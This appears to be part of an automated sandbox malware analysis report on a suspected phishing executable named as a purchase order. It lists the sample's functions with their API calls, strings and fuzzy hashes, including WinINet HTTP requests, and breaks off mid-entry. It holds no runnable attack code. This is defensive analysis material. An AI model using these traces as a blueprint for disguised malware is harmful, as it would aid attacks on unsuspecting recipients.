                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                  • API String ID: 0-1603158881
                                  • Opcode ID: b2205c720eb57eaa9acd20c5cdad8c47631596d61f09c649adc7dd6ac6f1094b
                                  • Instruction ID: 400245e8055df5988f0e80dfbae95eacb55e3b8a933f722a5dc1e2c8929bf265
                                  • Opcode Fuzzy Hash: b2205c720eb57eaa9acd20c5cdad8c47631596d61f09c649adc7dd6ac6f1094b
                                  • Instruction Fuzzy Hash: FAA162B5800204ABDF00EF61D8C1BEA3368AF54349F58857BEC096B146EB7D6909D77A
                                  Function 004485CB Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 109windowCOMMON
                                  Download Yara Rule
                                  APIs
                                  • CreateMenu.USER32 ref: 00448603
                                  • SetMenu.USER32(?,00000000), ref: 00448613
                                  • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00448697
                                  • IsMenu.USER32(?), ref: 004486AB
                                  • CreatePopupMenu.USER32 ref: 004486B5
                                  • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 004486EC
                                  • DrawMenuBar.USER32 ref: 004486F5
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: Menu$CreateItem$DrawInfoInsertPopup
                                  • String ID: 0
                                  • API String ID: 161812096-4108050209
                                  • Opcode ID: 5f9c542d8f07ae56d95057f828c3334b95156dd137b7db0efda9360fb5a3d221
                                  • Instruction ID: 1651b4fd0bf3e4e6d8e032b2651979207be8780685d2f09cc615cc8e1c1775d8
                                  • Opcode Fuzzy Hash: 5f9c542d8f07ae56d95057f828c3334b95156dd137b7db0efda9360fb5a3d221
                                  • Instruction Fuzzy Hash: 9D418B75A01209AFEB40DF98D884ADEB7B4FF49314F10815EED189B340DB74A851CFA8
                                  Function 00434034 Relevance: 14.0, APIs: 6, Strings: 2, Instructions: 49windowCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetModuleHandleW.KERNEL32(00000000,004A90E8,?,00000100,?,C:\Users\user\Desktop\Purchase Order_ AEPL-2324-1126.exe), ref: 00434057
                                  • LoadStringW.USER32(00000000), ref: 00434060
                                  • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 00434075
                                  • LoadStringW.USER32(00000000), ref: 00434078
                                  • _wprintf.LIBCMT ref: 004340A1
                                  • MessageBoxW.USER32(00000000,?,?,00011010), ref: 004340B9
                                  Strings
                                  • %s (%d) : ==> %s: %s %s, xrefs: 0043409C
                                  • C:\Users\user\Desktop\Purchase Order_ AEPL-2324-1126.exe, xrefs: 00434040
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: HandleLoadModuleString$Message_wprintf
                                  • String ID: %s (%d) : ==> %s: %s %s$C:\Users\user\Desktop\Purchase Order_ AEPL-2324-1126.exe
                                  • API String ID: 3648134473-3736306650
                                  • Opcode ID: 5806584fae846cee426602f55e287a2c1afdddb79e6f9c87a69d5249cd46d2cb
                                  • Instruction ID: 3f99f1473d628bc1a501e0113e735bb0cc043e2cca9b2706ac47da9b95460e2a
                                  • Opcode Fuzzy Hash: 5806584fae846cee426602f55e287a2c1afdddb79e6f9c87a69d5249cd46d2cb
                                  • Instruction Fuzzy Hash: EB016CB26903187EE710E754DD06FFA376CEBC4B11F00459AB708A61C49AF469848BB5
                                  Function 0047679F Relevance: 13.8, APIs: 9, Instructions: 307COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: dfbce8e1a613c74e072c21ad89e7d3e14579d4917e2b3053f757fec35ca8a5d3
                                  • Instruction ID: 0df76164974c5272bb459d6cb57aadea20bc0786d7edd9cc69ce034119999088
                                  • Opcode Fuzzy Hash: dfbce8e1a613c74e072c21ad89e7d3e14579d4917e2b3053f757fec35ca8a5d3
                                  • Instruction Fuzzy Hash: 10A1CE726083009FD310EF65D886B5BB3E9EBC4718F108E2EF559E7281D679E804CB96
                                  Function 004561DA Relevance: 13.7, APIs: 9, Instructions: 164COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: b2351d13dc7e01734d52893050a6426585663f8e33c7fb02d488baa67b0c7faf
                                  • Instruction ID: d12da5a9263b129e99c802cec43d72d92cc496201e336192e500ad81068e5f87
                                  • Opcode Fuzzy Hash: b2351d13dc7e01734d52893050a6426585663f8e33c7fb02d488baa67b0c7faf
                                  • Instruction Fuzzy Hash: D7519C70600305ABEB20DF69CC81F9B77A8AB08715F50462AFE05DB3C1E7B5E8588B58
                                  Function 00453893 Relevance: 13.7, APIs: 9, Instructions: 158filestringCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 00410120: GetFullPathNameW.KERNEL32(00000000,00000104,C:\Users\user\Desktop\Purchase Order_ AEPL-2324-1126.exe,0040F545,C:\Users\user\Desktop\Purchase Order_ AEPL-2324-1126.exe,004A90E8,C:\Users\user\Desktop\Purchase Order_ AEPL-2324-1126.exe,?,0040F545), ref: 0041013C
                                    • Part of subcall function 00433998: GetFileAttributesW.KERNEL32(?), ref: 0043399F
                                  • lstrcmpiW.KERNEL32(?,?), ref: 00453900
                                  • MoveFileW.KERNEL32(?,?), ref: 00453932
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: File$AttributesFullMoveNamePathlstrcmpi
                                  • String ID:
                                  • API String ID: 978794511-0
                                  • Opcode ID: e7576e1258f6bbb5b55b57ee2c4336deeb121e8720ac0ec1c8be93e036d3feb8
                                  • Instruction ID: 27746a5f3a3ee1b1e58f24b17d6851fe0efcb48f315c8e59f2eb92c6bb7fc6f1
                                  • Opcode Fuzzy Hash: e7576e1258f6bbb5b55b57ee2c4336deeb121e8720ac0ec1c8be93e036d3feb8
                                  • Instruction Fuzzy Hash: 295155B2C0021996CF20EFA1DD45BEEB379AF44305F0445DEEA0DA3101EB79AB98CB55
                                  Function 00441165 Relevance: 13.6, APIs: 9, Instructions: 142COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: dd945b6e1d8e8d9855cf24d2d3706bb91709aa24080d3beeb23df65cd9890c42
                                  • Instruction ID: 5433ce91f60fc94fc18d391a2a535eeaa569d09d9a52eba385401fd30cec28f3
                                  • Opcode Fuzzy Hash: dd945b6e1d8e8d9855cf24d2d3706bb91709aa24080d3beeb23df65cd9890c42
                                  • Instruction Fuzzy Hash: 5B41C4322142405AF3619B6DFCC4BEBBB98FBA6324F10056FF185E55A0C3EA74C58769
                                  Function 00432704 Relevance: 13.5, APIs: 9, Instructions: 42COMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: ClearVariant
                                  • String ID:
                                  • API String ID: 1473721057-0
                                  • Opcode ID: 3e0aaa4ed6ce8b6007e7bdda37da77eca1e161273c17b4dd860825949f7c6934
                                  • Instruction ID: 82c0e5a8bed1f7f82a0371e607e4af2e63fad7cf90771a3a9635cac59f663638
                                  • Opcode Fuzzy Hash: 3e0aaa4ed6ce8b6007e7bdda37da77eca1e161273c17b4dd860825949f7c6934
                                  • Instruction Fuzzy Hash: C301ECB6000B486AD630E7B9DC84FD7B7ED6B85600F018E1DE69A82514DA75F188CB64
                                  Function 0044F0B3 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 389COMMON
                                  Download Yara Rule
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: _memmove$_memcmp
                                  • String ID: '$\$h
                                  • API String ID: 2205784470-1303700344
                                  • Opcode ID: b142f59b2296442f2f65cbc20b4c9604eb51a9c16c8aaf0febd8f469beae5ca2
                                  • Instruction ID: e67660c870af743a7fabfec7c4e9e8b186464fd05e4f656457aecd1ba61caca8
                                  • Opcode Fuzzy Hash: b142f59b2296442f2f65cbc20b4c9604eb51a9c16c8aaf0febd8f469beae5ca2
                                  • Instruction Fuzzy Hash: 5CE1C070A002498FDB18CFA9D8806BEFBF2FF89304F28816ED84697341D778A945CB54
                                  Function 0045EA0F Relevance: 12.6, APIs: 6, Strings: 1, Instructions: 325timeCOMMON
                                  Download Yara Rule
                                  APIs
                                  • VariantInit.OLEAUT32(00000000), ref: 0045EA56
                                  • VariantCopy.OLEAUT32(00000000), ref: 0045EA60
                                  • VariantClear.OLEAUT32 ref: 0045EA6D
                                  • VariantTimeToSystemTime.OLEAUT32 ref: 0045EC06
                                  • __swprintf.LIBCMT ref: 0045EC33
                                  • VariantInit.OLEAUT32(00000000), ref: 0045ECEE
                                  Strings
                                  • %4d%02d%02d%02d%02d%02d, xrefs: 0045EC2D
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: Variant$InitTime$ClearCopySystem__swprintf
                                  • String ID: %4d%02d%02d%02d%02d%02d
                                  • API String ID: 2441338619-1568723262
                                  • Opcode ID: 35eb9c3aeff660f135fd63a8918d5c45c4a90ea0b18b9c33d96ad8571bc730e4
                                  • Instruction ID: 6ef9d3a4897ddb850998a39013325e9d2daf595bbef4806ea59c93c68b265cd6
                                  • Opcode Fuzzy Hash: 35eb9c3aeff660f135fd63a8918d5c45c4a90ea0b18b9c33d96ad8571bc730e4
                                  • Instruction Fuzzy Hash: F8A10873A0061487CB209F5AE48066AF7B0FF84721F1485AFED849B341C736AD99D7E5
                                  Function 004091B0 Relevance: 12.6, APIs: 6, Strings: 1, Instructions: 324sleepCOMMON
                                  Download Yara Rule
                                  APIs
                                  • InterlockedIncrement.KERNEL32(004A7F04), ref: 0042C659
                                  • InterlockedDecrement.KERNEL32(004A7F04), ref: 0042C677
                                  • Sleep.KERNEL32(0000000A), ref: 0042C67F
                                  • InterlockedIncrement.KERNEL32(004A7F04), ref: 0042C68A
                                  • InterlockedDecrement.KERNEL32(004A7F04), ref: 0042C73C
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: Interlocked$DecrementIncrement$Sleep
                                  • String ID: @COM_EVENTOBJ
                                  • API String ID: 327565842-2228938565
                                  • Opcode ID: ca0223daa9e96e83c575322b086aef175ea6f60956e985fc72e5b4b432ff0b62
                                  • Instruction ID: 079f2a2c733a9a3e151bbe14bd9981fb61a061d6167fc58a91b905d371dd4d86
                                  • Opcode Fuzzy Hash: ca0223daa9e96e83c575322b086aef175ea6f60956e985fc72e5b4b432ff0b62
                                  • Instruction Fuzzy Hash: 18D1D271A002198FDB10EF94C985BEEB7B0FF45304F60856AE5057B392D778AE46CB98
                                  Function 0047025C Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 288COMMON
                                  Download Yara Rule
                                  APIs
                                  • VariantClear.OLEAUT32(?), ref: 0047031B
                                  • VariantClear.OLEAUT32(?), ref: 0047044F
                                  • VariantInit.OLEAUT32(?), ref: 004704A3
                                  • DispCallFunc.OLEAUT32(?,?,?,00000015,?,?,?,?), ref: 00470504
                                  • VariantClear.OLEAUT32(?), ref: 00470516
                                    • Part of subcall function 00435481: VariantCopy.OLEAUT32(?,?), ref: 00435492
                                  • VariantCopy.OLEAUT32(?,?), ref: 0047057A
                                    • Part of subcall function 00435403: VariantClear.OLEAUT32(?), ref: 00435414
                                  • VariantClear.OLEAUT32(00000000), ref: 0047060D
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: Variant$Clear$Copy$CallDispFuncInit
                                  • String ID: H
                                  • API String ID: 3613100350-2852464175
                                  • Opcode ID: f2b9533c7a0a825d738ebca76906f6301bd96a0988b7340563647801aa66eb79
                                  • Instruction ID: 4e55d858753f5aac0b63ea9498fb9ef25a468b81cfd7169f1740116cc4944d08
                                  • Opcode Fuzzy Hash: f2b9533c7a0a825d738ebca76906f6301bd96a0988b7340563647801aa66eb79
                                  • Instruction Fuzzy Hash: 93B15BB5605311EFD710DF54C880A6BB3A4FF88308F049A2EFA8997351D738E951CB9A
                                  Function 00401CB0 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 240COMMON
                                  Download Yara Rule
                                  APIs
                                  • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00401D06
                                  • 74285CF0.USER32(?), ref: 00426F50
                                  • UnregisterHotKey.USER32(?), ref: 00426F77
                                  • FreeLibrary.KERNEL32(?), ref: 0042701F
                                  • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00427050
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: Free$74285LibrarySendStringUnregisterVirtual
                                  • String ID: close all
                                  • API String ID: 3499181032-3243417748
                                  • Opcode ID: 4fd900de9a28da208b58a3ba22ecdd4c26f042792ef41b4fe823b5ed5eb78ac9
                                  • Instruction ID: 89fc9d45334329c88beddca7a6314a06ce6e15860ee53b488cbf8147960762b2
                                  • Opcode Fuzzy Hash: 4fd900de9a28da208b58a3ba22ecdd4c26f042792ef41b4fe823b5ed5eb78ac9
                                  • Instruction Fuzzy Hash: 9BA1C174710212CFC710EF15C985B5AF3A8BF48304F5045AEE909672A2CB78BD96CF99
                                  Function 0044AA86 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 174networkCOMMON
                                  Download Yara Rule
                                  APIs
                                  • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 0044AAC5
                                  • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0044AAFA
                                  • InternetQueryOptionW.WININET(00000000,0000001F,00000000,00001000), ref: 0044AB5E
                                  • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 0044AB74
                                  • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0044AB83
                                  • HttpQueryInfoW.WININET(00000000,00000005,?,00001000,00000000), ref: 0044ABBB
                                    • Part of subcall function 004422CB: GetLastError.KERNEL32 ref: 004422E1
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: HttpInternet$OptionQueryRequest$ConnectErrorInfoLastOpenSend
                                  • String ID:
                                  • API String ID: 1291720006-3916222277
                                  • Opcode ID: 91fdcc8e85295173cca015a6521aec32459a41892940df1d160b2f6c73229ea3
                                  • Instruction ID: 89538bfc19842651326e528327905a39262a83d8aa3acd63c003c629d13479a9
                                  • Opcode Fuzzy Hash: 91fdcc8e85295173cca015a6521aec32459a41892940df1d160b2f6c73229ea3
                                  • Instruction Fuzzy Hash: FA51B1756403087BF710DF56DC86FEBB7A8FB88715F00851EFB0196281D7B8A5148BA8
                                  Function 0045FBAC Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 147windowCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetMenuItemInfoW.USER32(?,FFFFFFFF,00000000,00000030), ref: 0045FC48
                                  • IsMenu.USER32(?), ref: 0045FC5F
                                  • CreatePopupMenu.USER32 ref: 0045FC97
                                  • GetMenuItemCount.USER32(?), ref: 0045FCFD
                                  • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 0045FD26
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
